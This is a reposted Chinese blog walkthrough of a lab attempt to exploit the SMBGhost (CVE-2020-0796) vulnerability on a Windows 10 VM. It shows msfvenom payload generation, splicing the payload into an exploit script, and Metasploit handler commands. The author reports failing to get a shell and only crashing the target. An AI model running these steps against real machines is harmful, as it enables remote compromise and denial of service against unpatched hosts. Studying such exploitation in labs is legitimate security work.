标签:getshell ip multi tcp exploit handler 2020 0796 msf6
目标主机
把防火墙关了
关闭后可以ping通之后
连接反向木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
看到buf=。。。。这些编码全部复制下来
双击打开我们下载好的exploit.py
往下拉找到以USER_PAYLOAD开头的编码,将我们刚刚复制的替换上去
然后把全部buf改为USER_PAYLOAD,替换完后保存
启动美少妇(msfconsole)
payload:
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6
exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp msf6
exploit(multi/handler) > set loprt 4444
loprt => 4444
msf6 exploit(multi/handler) > set rhost 目标ip地址
rhost => 192.168.xx.132 msf6 exploit(multi/handler) > options
run之后等待连接,这时候我们重新开个终端运行我们刚刚修改过的exploit.py
正常情况下输入:python3 exploit.py -ip 目标ip地址
就会获取getshell
还可以蓝屏按道理我这个镜像的这个编号漏洞没打补丁才是,但是一直报physical read primitive failed!我也不知道咋搞,就到这吧,虽然没拿到getshell,后面有空再安装个win10 1903的版本,我这个是1909 x64的
python exploit.py -ip 目标ip地址
用python2运行直接蓝屏
标签:getshell,ip,multi,tcp,exploit,handler,2020,0796,msf6 来源: https://blog.csdn.net/qq_35258210/article/details/113602620
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。